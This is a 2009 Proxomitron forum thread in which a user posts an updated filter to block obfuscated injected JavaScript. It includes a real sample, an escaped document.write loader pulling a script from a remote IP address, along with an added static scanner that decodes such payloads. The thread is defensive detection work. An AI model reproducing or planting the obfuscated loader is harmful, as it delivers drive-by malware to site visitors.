The Un-Official Proxomitron Forum
Bugfix + 0day: JS Kill - Specific Escaped Code

+- The Un-Official Proxomitron Forum (https://www.prxbx.com/forums)
+-- Forum: Proxomitron Config Sets (/forumdisplay.php?fid=43)
+--- Forum: Sidki (/forumdisplay.php?fid=44)
+--- Thread: Bugfix + 0day: JS Kill - Specific Escaped Code (/showthread.php?tid=1333)



Bugfix + 0day: JS Kill - Specific Escaped Code - sidki3003 - Apr. 01, 2009 09:25 PM

Two changes:
- Global variable "a" wasn't always reset, resulting in odd (but harmless) secondary effects.
- I came across two sites today containing code (pointing to a Latvian server) like:
Code:
document.write(unescape('%3Cscrz7RiKQpt%20srK7c%3D%2F%2F94%2E247cMV%2E6xE2Hsh%2E1z7R93N5z7R%2FfIejq3Nuery%2Ejz7RsK7%3E3N%3C%2FsfIecriz7Rpt3N%3E').replace(/K7|fIe|cMV|z7R|KQ|Hsh|6xE|3N|NK/g,""));


If the new subroutine matches, you'll get a Log-Rare entry like:
Code:
WEB JS_Escape     replace     http://my-hijacked-site.com/

Let me know of any false positives.


Code:
[Patterns]
Name = "JS Kill: Specific Escaped Code     9.04.01 [sd] (d.2)"
Active = TRUE
URL = "($TYPE(htm)|$TYPE(js)|$TYPE(vbs))(^$TST(keyword=*.(a_js|a_jsmeth).*))"
Limit = 7800
Match = "\= \" (%3C$TST(script=[1s]*)((%73%63|%53%43)\4|)("
        "*\"$SET(1==\"\")$SET(5= (string))|$SET(1==\"\"; var prxBlocked=\")$SET(5= (string, large))*"
        ")&&(^*</script)\6)"
        "|\= \' (%3C$TST(script=[1s]*)((%73%63|%53%43)\4|)("
        "*\'$SET(1==\'\')$SET(5= (string))|$SET(1==\'\'; var prxBlocked=\')$SET(5= (string, large))*"
        ")&&(^*</script)\6)"
        "|unescape \($TST(script=[1s]*) ("
        "$INEST(\(,(")\2(^%") (%3C(%73%63|%53%43)\4*|\6),\))\)"
        "((^ [,;)])(.(replace)\4$SET(1=\2\2.replace)|)|$SET(1=\2\2))"
        "|\\(")\2 (%3C(%73%63|%53%43)\4*|\6)\\$TST(\2) \)((^ [,;)])|$SET(1=\\\2\\\2))$SET(5= (2nd level))"
        "|(\\+")\2(^%")$SET(1=PrxVoidF\(\2Blocked: $GET(a)\2, \2\4\6)$SET(5= (large))"
        " (^*</script)(%3C(%73%63|%53%43)\4\6|\6)"
        ")"
        "&"
        "$TST(\4=replace$SET(a=\4)|$SET(a=script)*)"
        "|$TST($UESC(\6)=*("
        ".(createControlRange|FileSystemObject|fromCharCode)\4$SET(a=\4)"
        "|<(iframe$SET(a=iframe)|applet$SET(a=applet)|object[^>]++data=$SET(a=object data))"
        "|c("
        "reateObject$SET(a=CreateObject)"
        "|l(sid( \(" {| : {+|=" {+)|assid=" {+)(^D27CDB6E-AE6D-11cf-96B8-444553540000|[^0-9a-f])"
        "$LST(ClassIDs)$SET(a=ClsID: \9)"
        ")"
        "|ms-its:$SET(a=ms-its)"
        "|src=$TST(flag=*.adurl:1.*)(\\(")\3 ((^\\$TST(\3))*\\$TST(\3)&&$LST(AdList)$SET(a=src: \9)*)|"
        "$AV( ?*& $LST(AdList)$SET(a=src: \9)))"
        "|unescape(^(^ \())$SET(a=unescape)"
        "|VBScript$SET(a=VBScript)"
        ")*)"
        "&"
        "($TYPE(htm)$SET(eHits=$GET(eHits)"
        "%3Cspan class=%22ProxFly-Span%22>$GET(mHead) JS Escape:%3C/span>"
        "      $ESC($GET(a))\5%3Cbr class=%22ProxFly-Br%22 />"
        ")|)"
        "($TST(volat=*.log:2*)$ADDLST(Log-Main,[$DTM(d T)]\tWEB JS_Escape\5 \t$GET(a) \t\u)|)"
        "($TST(volat=*.log:[12]c.*)$ADDLST(Log-Rare,WEB JS_Escape\5 \t$GET(a) \t\u)|)"
Replace = "\1$SET(a=)"
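
Editor's added example (not a post in this thread and not part of sidki's config set): a stand-alone JavaScript scanner that does statically what the `unescape \(` branch of the filter above does in Proxomitron's matching language. It locates `unescape('…')` calls, applies any chained `.replace(/…/g, '…')` calls itself instead of letting the page run them (no eval, no DOM), and reports what the call unpacks to together with the reason the filter would log: `replace` when a `.replace()` chain follows, otherwise the first indicator found in the unescaped text. The indicator list is a simplified rendering of the filter's `$UESC(\6)` tests; the ClassIDs and AdList lookups are left out. The first sample is the snippet quoted in the post; the other two, the `example.invalid` host and the function names `scan`, `logLine` and `legacyUnescape` are constructed here for illustration. The URL in the log line is the one from the post's Log-Rare example.

```javascript
// Added example (not part of the thread or of sidki's config set): a static
// unpacker for document.write(unescape('...').replace(/.../g, "")) payloads.
// No eval, no DOM: safe to run over untrusted script text. Node.js, no deps.

// Constructed samples. SAMPLE_FROM_POST is the snippet quoted in the post above;
// the other two are made up here to exercise the remaining code paths.
const SAMPLE_FROM_POST =
  `document.write(unescape('%3Cscrz7RiKQpt%20srK7c%3D%2F%2F94%2E247cMV%2E6xE2Hsh%2E1z7R93N5z7R%2FfIejq3Nuery%2Ejz7RsK7%3E3N%3C%2FsfIecriz7Rpt3N%3E').replace(/K7|fIe|cMV|z7R|KQ|Hsh|6xE|3N|NK/g,""));`;
const SAMPLE_IFRAME = `var f = unescape("%3Ciframe src=%22//example.invalid/%22%3E"); document.write(f);`;
const SAMPLE_BENIGN = `var s = unescape("hello%20world");`;

// Annex B unescape(): %XX -> Latin-1 code unit, %uXXXX -> UTF-16 code unit.
// Reimplemented so the behaviour is explicit instead of relying on the deprecated global.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Minimal JS string-literal unquoting: \xHH, \uHHHH, the common control escapes,
// and "an escaped anything else is itself" (covers \' \" \\ \/).
const CTRL = { n: "\n", r: "\r", t: "\t", "0": "\0" };
function unquote(body) {
  return body.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[\s\S])/g, (_, e) =>
    e.length > 1 ? String.fromCharCode(parseInt(e.slice(1), 16)) : (CTRL[e] ?? e));
}

// unescape( 'literal' ): [1] quote character, [2] raw literal body.
const UNESCAPE_CALL = /\bunescape\s*\(\s*(['"])((?:\\[\s\S]|(?!\1)[^\\])*)\1\s*\)/g;
// A chained .replace( /re/flags , 'literal' ) directly after it (sticky match).
const REPLACE_CALL = /\s*\.replace\s*\(\s*\/((?:\\.|[^\\\/])+)\/([a-z]*)\s*,\s*(['"])((?:\\[\s\S]|(?!\3)[^\\])*)\3\s*\)/y;

// What the filter's $UESC(\6) test looks for in the decoded text, simplified:
// the ClassIDs and AdList lookups of the real filter are not reproduced here.
const INDICATORS = [
  [/<script\b/i, "script"],
  [/<iframe\b/i, "iframe"],
  [/<applet\b/i, "applet"],
  [/<object\b[^>]*\bdata=/i, "object data"],
  [/\.(createControlRange|FileSystemObject|fromCharCode)\b/, (m) => m[1]],
  [/\bcreateObject\b/i, "CreateObject"],
  [/\bclsid\b/i, "ClsID"],
  [/\bms-its:/i, "ms-its"],
  [/\bunescape\s*\(/, "unescape"],
  [/\bVBScript\b/i, "VBScript"],
];

function indicator(text) {
  for (const [re, label] of INDICATORS) {
    const m = re.exec(text);
    if (m) return typeof label === "function" ? label(m) : label;
  }
  return null;
}

// Find every unescape('...') call, apply chained .replace() calls statically,
// and report the decoded result plus the reason the filter would log for it:
// "replace" when a .replace() chain follows (as in the post's Log-Rare line),
// otherwise the first indicator found in the unescaped text, or null if none.
function scan(src) {
  const hits = [];
  UNESCAPE_CALL.lastIndex = 0;
  let m;
  while ((m = UNESCAPE_CALL.exec(src)) !== null) {
    let decoded = legacyUnescape(unquote(m[2]));
    let end = UNESCAPE_CALL.lastIndex;
    let replaces = 0;
    REPLACE_CALL.lastIndex = end;
    let r;
    while ((r = REPLACE_CALL.exec(src)) !== null) {
      end = REPLACE_CALL.lastIndex;
      replaces++;
      try {
        // The pattern comes from untrusted input and a crafted one can be slow
        // (ReDoS), so cap its length and skip anything that will not compile.
        if (r[1].length <= 512) decoded = decoded.replace(new RegExp(r[1], r[2]), unquote(r[4]));
      } catch (_e) { /* invalid regex or flags: leave decoded as it was */ }
    }
    hits.push({
      call: src.slice(m.index, end),
      decoded,
      reason: replaces > 0 ? "replace" : indicator(decoded),
      decodedIndicator: indicator(decoded),
    });
  }
  return hits;
}

// Same shape as the filter's Log-Rare entry: "WEB JS_Escape \t<reason> \t<url>".
function logLine(hit, url) {
  return `WEB JS_Escape \t${hit.reason} \t${url}`;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const src of [SAMPLE_FROM_POST, SAMPLE_IFRAME, SAMPLE_BENIGN]) {
    for (const hit of scan(src)) {
      if (hit.reason) console.log(logLine(hit, "http://my-hijacked-site.com/"));
      else console.log("not flagged:", hit.call);
      console.log("  unpacks to:", JSON.stringify(hit.decoded));
    }
  }
}
```

Run it with `node scanner.js`. On the snippet from the post it reports `replace` and shows that the call unpacks to a `<script src=//94.247.2.195/jquery.js></script>` tag, which is the part the filter never has to compute: it flags the shape (`unescape(` followed by `.replace`) before the script runs. The `.replace()` regex is compiled from attacker-controlled text, so a production scanner should keep the length cap or run the replacement under a timeout.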



RE: Bugfix + 0day: JS Kill - Specific Escaped Code - bugger - Apr. 02, 2009 01:15 AM

Where do I put the filter?

Under JS intercept?


RE: Bugfix + 0day: JS Kill - Specific Escaped Code - sidki3003 - Apr. 02, 2009 01:34 AM

Dang, as mentioned above, it's an update. ;)
So, look for the previous version, untick it, place the new version above it, save the config.


RE: Bugfix + 0day: JS Kill - Specific Escaped Code - bugger - Apr. 02, 2009 02:31 AM

Oh bugger. My apology!